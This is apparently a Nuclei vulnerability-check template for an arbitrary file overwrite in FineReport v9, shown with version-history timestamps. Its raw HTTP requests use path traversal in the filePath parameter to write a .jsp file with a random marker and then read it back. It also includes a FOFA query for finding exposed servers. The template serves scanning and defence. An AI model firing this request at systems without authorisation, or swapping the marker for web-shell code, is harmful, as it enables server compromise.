2023-08-22 11:27:51 +00:00
|
|
|
id: fine-report-v9-file-upload
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: FineReport v9 Arbitrary File Overwrite
|
|
|
|
|
author: SleepingBag945
|
|
|
|
|
severity: critical
|
2024-01-02 15:45:12 +00:00
|
|
|
description: FineReport ( A business intelligence (BI) and reporting software ) is vulnerable to Arbitrary File Overwrite.
|
2023-08-22 11:27:51 +00:00
|
|
|
reference:
|
2023-08-22 11:33:04 +00:00
|
|
|
- https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.
|
|
|
|
|
metadata:
|
2023-08-23 13:26:57 +00:00
|
|
|
max-request: 2
|
2023-10-14 11:27:55 +00:00
|
|
|
fofa-query: app="帆软-FineReport"
|
2023-08-22 11:31:02 +00:00
|
|
|
tags: finereport,fileupload,intrusive
|
2023-08-22 11:27:51 +00:00
|
|
|
variables:
|
|
|
|
|
string: '{{rand_base(8, "abc")}}'
|
2023-08-23 13:20:56 +00:00
|
|
|
filename: '{{rand_base(8)}}'
|
2023-08-22 11:27:51 +00:00
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- raw:
|
|
|
|
|
- |
|
2023-08-23 13:20:56 +00:00
|
|
|
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1
|
2023-08-22 11:27:51 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Content-Type: text/xml;charset=UTF-8
|
|
|
|
|
|
|
|
|
|
{"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
|
|
|
|
|
- |
|
2023-08-23 13:20:56 +00:00
|
|
|
GET /WebReport/{{filename}}.jsp HTTP/1.1
|
2023-08-22 11:27:51 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
part: body_2
|
|
|
|
|
words:
|
|
|
|
|
- "{{string}}"
|
2024-01-15 11:49:24 +00:00
|
|
|
# digest: 4a0a004730450221008ae86f1c7b73531c448220a6162814af9394d20810e327e1b24a907f6637ca7c02202a621d0d57f5bc5c317b823b896fc87a6c05c89c2b116c3bd562444528eeaef5:922c64590222798bb761d5b6d8e72950
|
